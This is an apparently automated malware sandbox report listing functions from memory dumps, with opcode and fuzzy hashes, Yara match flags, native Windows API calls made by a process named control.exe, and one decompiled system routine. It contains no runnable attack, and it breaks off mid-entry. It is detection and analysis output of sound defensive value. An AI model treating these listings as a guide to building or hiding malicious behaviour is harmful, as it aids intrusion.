Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e2113b14bc484459fbb86e61123a8f83ab9b5a9b2dad41bad9042a47b9cb06c
Instruction ID: ed6be8a705f1f99ec2925b122e226e47ca715ea7f66ea622bddd2c9e1b2107ba
Opcode Fuzzy Hash: 0e2113b14bc484459fbb86e61123a8f83ab9b5a9b2dad41bad9042a47b9cb06c
Instruction Fuzzy Hash: BD90027120500802D30461694804B86000597D0341F52C035A6114695E96A58891B171

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: add9bab60737f7f7ba5a81373750a82865a8c2ff13d4dbfab44601ab0723e2f1
Instruction ID: a40986a61de035ca1deb007017e058ca5b8c1f0627919953ee223e5ded9b15a5
Opcode Fuzzy Hash: add9bab60737f7f7ba5a81373750a82865a8c2ff13d4dbfab44601ab0723e2f1
Instruction Fuzzy Hash: 239002E1205140924700A2698404F0A450597E0341B52C03AE11445A0CC5658851E175

Uniqueness

Uniqueness Score: -1.00%

Function 00ABAD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95fd52f1bce1ecd8d071973ab841f865fd9f0ff9f722ecf0c37a3f197796d31f
Instruction ID: 5b81e486b5d4539877e3a6433a19d3b6de9dc8f3256072923b218d431a09c67b
Opcode Fuzzy Hash: 95fd52f1bce1ecd8d071973ab841f865fd9f0ff9f722ecf0c37a3f197796d31f
Instruction Fuzzy Hash: 6C900271A0900012934071694814B464006A7E0781B56C035A0604594C89948A55A3E1

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73f4bf5880e6f94489d74f0b234c55ea0141302af988571524e8edcd4c7c3316
Instruction ID: 6c2f8a19244e812241081d30dcb70f43dcdff8f02f24bb6a79f8744fdf53db68
Opcode Fuzzy Hash: 73f4bf5880e6f94489d74f0b234c55ea0141302af988571524e8edcd4c7c3316
Instruction Fuzzy Hash: 3F900265225000020345A5690604A0B0445A7D6391392C039F15065D0CC6618865A361

Uniqueness

Uniqueness Score: -1.00%

Function 00AB96D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67600f62cd35d224edd333db3325c75a2f9469fa40de186bebd4ba0ce09cca48
Instruction ID: fb575ff8cfa5ee648c23addf5987a082e8a26b5af66340ad18b81a3f79ad7e67
Opcode Fuzzy Hash: 67600f62cd35d224edd333db3325c75a2f9469fa40de186bebd4ba0ce09cca48
Instruction Fuzzy Hash: 5490027120500842D30061694404F46000597E0341F52C03AA0214694D8655C851B561

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4713a286106670c80f211357841a4488566ab18476fb25ccb6ab9fb6a892d485
Instruction ID: 89d22fcf2b6f08c97e692b5398c26ac0dee9abfa238ef4b11e3b99c0f9003f80
Opcode Fuzzy Hash: 4713a286106670c80f211357841a4488566ab18476fb25ccb6ab9fb6a892d485
Instruction Fuzzy Hash: 2F90027160900802D35071694414B46000597D0341F52C035A0114694D87958A55B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6ea5b3d13714d781358bf8a5f3c7c785572597c955bf31040a6b18f35d3521c
Instruction ID: 48db54c47d282b32d5aa0cc7158c4e10406cd6b064d8023c1ad0eddd854dcc2a
Opcode Fuzzy Hash: b6ea5b3d13714d781358bf8a5f3c7c785572597c955bf31040a6b18f35d3521c
Instruction Fuzzy Hash: 6790027120904842D34071694404F46001597D0345F52C035A01546D4D96658D55F6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9FE0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fc8663e18b459676708d7c861d57229102882c7bc1d90b4b1587300a555a7b2
Instruction ID: 13b9e750c891e9de3df035afe71697c3ad864ce51e480c7cae803506e194450d
Opcode Fuzzy Hash: 9fc8663e18b459676708d7c861d57229102882c7bc1d90b4b1587300a555a7b2
Instruction Fuzzy Hash: 7490027131514402D31061698404B06000597D1341F52C435A0914598D86D58891B162

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0b4f155f5301873da2c0df0726af076bc39bf9367bef183bde372dffa977678
Instruction ID: 133f25e20edba5eec6c66537ff6acf3799fd51e7aafa144d3ac0cf8f79806eb1
Opcode Fuzzy Hash: c0b4f155f5301873da2c0df0726af076bc39bf9367bef183bde372dffa977678
Instruction Fuzzy Hash: F790026160900402D34071695418B06001597D0341F52D035A0114594DC6998A55B6E1

Uniqueness

Uniqueness Score: -1.00%

Function 00ABA710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a50cf37d77eed41a34a5212c7595780acb6d614a625c751e187858ab294472d
Instruction ID: ad979abee1b31fb37d86e7209d2f09f58b23bb9b8142aaba8bc4d94e1f0f0964
Opcode Fuzzy Hash: 1a50cf37d77eed41a34a5212c7595780acb6d614a625c751e187858ab294472d
Instruction Fuzzy Hash: DE900271305000529700A6A95804F4A410597F0341B52D039A4104594C85948861A161

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70be82affbdc52f07e042d7c88c0ca3fe991817a71b42a08d6f420f0fd18ba17
Instruction ID: b5fedd925999d55cdd36c154a349704c6730e4f8af98a0ff374cffabcdc2c0b5
Opcode Fuzzy Hash: 70be82affbdc52f07e042d7c88c0ca3fe991817a71b42a08d6f420f0fd18ba17
Instruction Fuzzy Hash: B490027120500403D30061695508B07000597D0341F52D435A0514598DD6968851B161

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf655df608b544bb2c7b9214b8c06628a891535faf152b8dc9ade33c54ba4e0
Instruction ID: 2820e33edad96c8073d441cf8b467349140a2c2c5665985fd971a08317af0b9f
Opcode Fuzzy Hash: aaf655df608b544bb2c7b9214b8c06628a891535faf152b8dc9ade33c54ba4e0
Instruction Fuzzy Hash: 0990026120904442D30065695408F06000597D0345F52D035A11545D5DC6758851F171

Uniqueness

Uniqueness Score: -1.00%

Function 00ABA770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aad387282feb1bddab33835f501451b8892d5c6b939f512ccccbe4dc968978b
Instruction ID: 839f87062b0c8f29c0d1ed1583676903a87c8895062ab4ada9e5a5374e6dafb7
Opcode Fuzzy Hash: 9aad387282feb1bddab33835f501451b8892d5c6b939f512ccccbe4dc968978b
Instruction Fuzzy Hash: C790027520904442D70065695804F87000597D0345F52D435A05145DCD86948861F161

Uniqueness

Uniqueness Score: -1.00%

Function 00AB9670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: fffe924e3715e38202a0e3d92c7aa9f816dad169290f16defe818bb41ed2bb3a
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00B0FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00B0FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00ABCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B05720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B05720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x00b0fdda
0x00b0fde2
0x00b0fde5
0x00b0fdec
0x00b0fdfa
0x00b0fdff
0x00b0fe0a
0x00b0fe0f
0x00b0fe17
0x00b0fe1e
0x00b0fe19
0x00b0fe19
0x00b0fe19
0x00b0fe20
0x00b0fe21
0x00b0fe22
0x00b0fe25
0x00b0fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B0FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B0FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B0FE2B

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: c695ffa3c0483e8cbd58a0e67f530350a040c27bc758f290da3912682dcdbe8a
Instruction ID: acea7fd983f31da6c1ca6c994c62319758937d631e160ad9cbbf45cef84d7896
Opcode Fuzzy Hash: c695ffa3c0483e8cbd58a0e67f530350a040c27bc758f290da3912682dcdbe8a
Instruction Fuzzy Hash: 6EF0F632200601BFD6301A45DC06F73BFAAEB44730F240354F628565E2DA62FC2097F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: control.exe PID: 6932 Parent PID: 3472 control.exeCOMMON

Executed Functions

Function 02FC9D5A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02FC4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02FC4B87,007A002E,00000000,00000060,00000000,00000000), ref: 02FC9DAD

Strings

.z`, xrefs: 02FC9D9D, 02FC9DA8

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 6f7c1f125a4f6b05b8b3e8613dd503a37bdb7517ab6c9ddbba2e95545b684a44
Instruction ID: 13bcd6d3fe327556f2b0605fd1fd08a0a8194a4650669b92066d9a1c890aa576
Opcode Fuzzy Hash: 6f7c1f125a4f6b05b8b3e8613dd503a37bdb7517ab6c9ddbba2e95545b684a44
Instruction Fuzzy Hash: A201DEB2205108ABDB08CF88CD95DDB77ADEF4C754F158688BA4D97241D631E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02FC9D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02FC4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02FC4B87,007A002E,00000000,00000060,00000000,00000000), ref: 02FC9DAD

Strings

.z`, xrefs: 02FC9D9D, 02FC9DA8

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 3f37beb0f838e11ece69e51729e22d12e72e9dbff31f30f68a569e4eaa41e6ba
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: BCF0B2B2200208ABCB48CF88DC95EEB77ADAF8C754F158248BA0D97240C630F8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02FC9E0A, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02FC4D42,5EB6522D,FFFFFFFF,02FC4A01,?,?,02FC4D42,?,02FC4A01,FFFFFFFF,5EB6522D,02FC4D42,?,00000000), ref: 02FC9E55

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 293bb9453cdb17cad94378a919b07c1d5b417ee36a18e2c385878743a02a47a0
Instruction ID: 9ef2154660551c06a58e5c1701c702bc61d7218daaa455a96a945bdbe8c9c50c
Opcode Fuzzy Hash: 293bb9453cdb17cad94378a919b07c1d5b417ee36a18e2c385878743a02a47a0
Instruction Fuzzy Hash: 09F0E7B6200109ABDB04DF99DC80DEB77A9FF8C354F158248FA0D97255D631E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02FC9E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02FC4D42,5EB6522D,FFFFFFFF,02FC4A01,?,?,02FC4D42,?,02FC4A01,FFFFFFFF,5EB6522D,02FC4D42,?,00000000), ref: 02FC9E55

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: bb65cde2fd30580a048fef9ca16314d271c467aef16dccc2756df6827a0af1db
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 99F0A9B2200108ABCB14DF89DC91DEB77ADEF8C754F158248BA1D97241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02FC9F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02FB2D11,00002000,00003000,00000004), ref: 02FC9F79

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: aa4a77fe136904ddecf1e382c332bac5648e8c1494ae45358b870cca6cc814c1
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 0EF015B2200208ABCB18DF89CC81EAB77ADEF88750F118148BE08A7241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02FC9F3A, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02FB2D11,00002000,00003000,00000004), ref: 02FC9F79

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 971a1df24cf7771ce165f7dde8c4d715c67a8d1c81f39a90d420e26e17c94d42
Instruction ID: 4b015302ad26dcde8ca9a75ab424975046f84c2235c988df8a4fe79485b40671
Opcode Fuzzy Hash: 971a1df24cf7771ce165f7dde8c4d715c67a8d1c81f39a90d420e26e17c94d42
Instruction Fuzzy Hash: 9FF08CB1100149ABCB14EF68DC81CA7BBA9FF88210B15864DFD98A7202C230E825CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 02FC9E8A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02FC4D20,?,?,02FC4D20,00000000,FFFFFFFF), ref: 02FC9EB5

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 0e3f9c2017521587f2c9b0f5f3e7365a73a2e9058f1652688f4922f4f99f5404
Instruction ID: 3050f234a9d94102fcaebdde21a7aba689bfe69a1d5cbaa55d52da9d39e1fddd
Opcode Fuzzy Hash: 0e3f9c2017521587f2c9b0f5f3e7365a73a2e9058f1652688f4922f4f99f5404
Instruction Fuzzy Hash: 28E0C27520020CABD714EFE4CC86F977B68EF44B50F118159BA589B241D530FA0087D0

Uniqueness

Uniqueness Score: -1.00%

Function 02FC9E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02FC4D20,?,?,02FC4D20,00000000,FFFFFFFF), ref: 02FC9EB5

Memory Dump Source

Source File: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, Offset: 02FB0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: e95469515cfc1d3b34da0eb23883b772eb6010f1c20f810e3010d0380775b39e
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 9AD012752002186BD714EF98CC85E97775DEF44750F154459BA585B241C530F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 04779540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0477954A

Memory Dump Source

Source File: 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true

Associated: 00000009.00000002.498159870.000000000482B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.498171281.000000000482F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4a23e7bfd24764abea7aef1b5907ad3907d23d2ad6cdc44de16ac624d6eed54a
Instruction ID: 014803386cd8810602c251efe0935cf1a4baac3dcc5d38263e231dc1db4d369a
Opcode Fuzzy Hash: 4a23e7bfd24764abea7aef1b5907ad3907d23d2ad6cdc44de16ac624d6eed54a
Instruction Fuzzy Hash: AC900275251000072115B5594704907004697E9395351C035F1006564CD661D8657161

Uniqueness

Uniqueness Score: -1.00%

Function 047795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047795DA

Memory Dump Source

Source File: 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true

Associated: 00000009.00000002.498159870.000000000482B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.498171281.000000000482F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5c1fccf4d08f655f4b984e910c3469de88d498ce1230809278a7bc2351e744ca
Instruction ID: 0285e9a219eecfcee0d3d06970f113eedea83386e4e323b86394dc11226a7b31
Opcode Fuzzy Hash: 5c1fccf4d08f655f4b984e910c3469de88d498ce1230809278a7bc2351e744ca
Instruction Fuzzy Hash: 4D9002B124200007611571598414A16400A97F4245B51C035E10055A4DC565D8957165

Uniqueness

Uniqueness Score: -1.00%

Function 04779660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0477966A

Memory Dump Source

Source File: 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true

Associated: 00000009.00000002.498159870.000000000482B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.498171281.000000000482F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 49e9a3b5a0dc50e78b9504f195f9b46123f8f0926a5eed710a922e983a5ccbbb
Instruction ID: 5584065e4659a6f654b6ed98886a48f8ed3146c547bc0abd48e41dbbb9215a97
Opcode Fuzzy Hash: 49e9a3b5a0dc50e78b9504f195f9b46123f8f0926a5eed710a922e983a5ccbbb
Instruction Fuzzy Hash: 5590027124100806F19071598404A4A000597E5345F91C029E0016668DCA55DA5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 04779650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0477965A

Memory Dump Source

Source File: 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true

Associated: 00000009.00000002.498159870.000000000482B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.498171281.000000000482F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5630d5d60942fa2f3e54c4d65e820debb29c65710ab39171ed9fc58d2ba97a16
Instruction ID: d3fe303099351703a85c377f53a3ef3396e372accd24bd13159cce221aaaee8f
Opcode Fuzzy Hash: 5630d5d60942fa2f3e54c4d65e820debb29c65710ab39171ed9fc58d2ba97a16
Instruction Fuzzy Hash: 7B90027124504846F15071598404E46001597E4349F51C025E00556A8D9665DD59B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 047796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047796EA

Memory Dump Source

Source File: 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true

Associated: 00000009.00000002.498159870.000000000482B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.498171281.000000000482F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db0735b18d546544b6607461e4394b7b13f0f9c8f33025e7c289e36645050491
Instruction ID: edab0d42843aaa35cee782205310f3b0cd00cd190351771c6fb6a8024e779e0f
Opcode Fuzzy Hash: db0735b18d546544b6607461e4394b7b13f0f9c8f33025e7c289e36645050491
Instruction Fuzzy Hash: A990027124108806F1207159C404B4A000597E4345F55C425E441566CD86D5D8957161

Uniqueness

Uniqueness Score: -1.00%

Function 047796D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047796DA

Memory Dump Source

Source File: 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true

Associated: 00000009.00000002.498159870.000000000482B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.498171281.000000000482F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 01cbd6c8c5e313c32d83c2343519da955aa59c3bae9be84b85ee44f2cb9fead5
Instruction ID: 81c3fc9cf431b443248c8f45a049a5a1c52b15b03f8d4c4df705f79ba51fb8c5
Opcode Fuzzy Hash: 01cbd6c8c5e313c32d83c2343519da955aa59c3bae9be84b85ee44f2cb9fead5
Instruction Fuzzy Hash: 7D90027124100846F11071598404F46000597F4345F51C02AE0115668D8655D8557561

Uniqueness

Uniqueness Score: -1.00%

Function 04779710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0477971A

Memory Dump Source

Source File: 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true

Associated: 00000009.00000002.498159870.000000000482B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.498171281.000000000482F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e437b734955f5d24fa47e20211b828e02825f25e1e5b823c5920864770ea380
Instruction ID: 0d08fb4d96013d097328c51371e05d333170b4d6e436f6c09bf41ed0021d4fc1
Opcode Fuzzy Hash: 4e437b734955f5d24fa47e20211b828e02825f25e1e5b823c5920864770ea380
Instruction Fuzzy Hash: 9890027124100406F11075999408A46000597F4345F51D025E5015569EC6A5D8957171

Uniqueness

Uniqueness Score: -1.00%

Function 04779FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04779FEA

Memory Dump Source

Source File: 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true

Associated: 00000009.00000002.498159870.000000000482B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.498171281.000000000482F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 247086f47e876b0ab8117d06442d85fd1a306077adaf50de6a5da51ec94a95db
Instruction ID: bdcf523ae27eb52ecf403699949c1880f3aa041d7a75a4a921619b7a5b918841
Opcode Fuzzy Hash: 247086f47e876b0ab8117d06442d85fd1a306077adaf50de6a5da51ec94a95db
Instruction Fuzzy Hash: 6C90027135114406F1207159C404B06000597E5245F51C425E081556CD86D5D8957162

Uniqueness

Uniqueness Score: -1.00%

Function 04779780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0477978A

Memory Dump Source

Source File: 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true

Associated: 00000009.00000002.498159870.000000000482B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.498171281.000000000482F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f49e21176eab3828d2f309e94b59d50702730ad18c6346be78348dbecd7792ec
Instruction ID: b619b6b36c51970f45ae2b25bfcb1fdb726bb728d7f4f3a6b61ad7235f31f14f
Opcode Fuzzy Hash: f49e21176eab3828d2f309e94b59d50702730ad18c6346be78348dbecd7792ec
Instruction Fuzzy Hash: 0890027925300006F19071599408A0A000597E5246F91D429E000656CCC955D86D7361

Uniqueness

Uniqueness Score: -1.00%

Function 04779860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0477986A

Memory Dump Source

Source File: 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true

Associated: 00000009.00000002.498159870.000000000482B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.498171281.000000000482F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 92d6776fad4ad525ae32368690aa2c556c6033913f99fb2ef3712c8b39c77a81
Instruction ID: 356edf8a4880885a38f981b1f7cb51325498aa8af4b22352ec53afeccdb78dc1
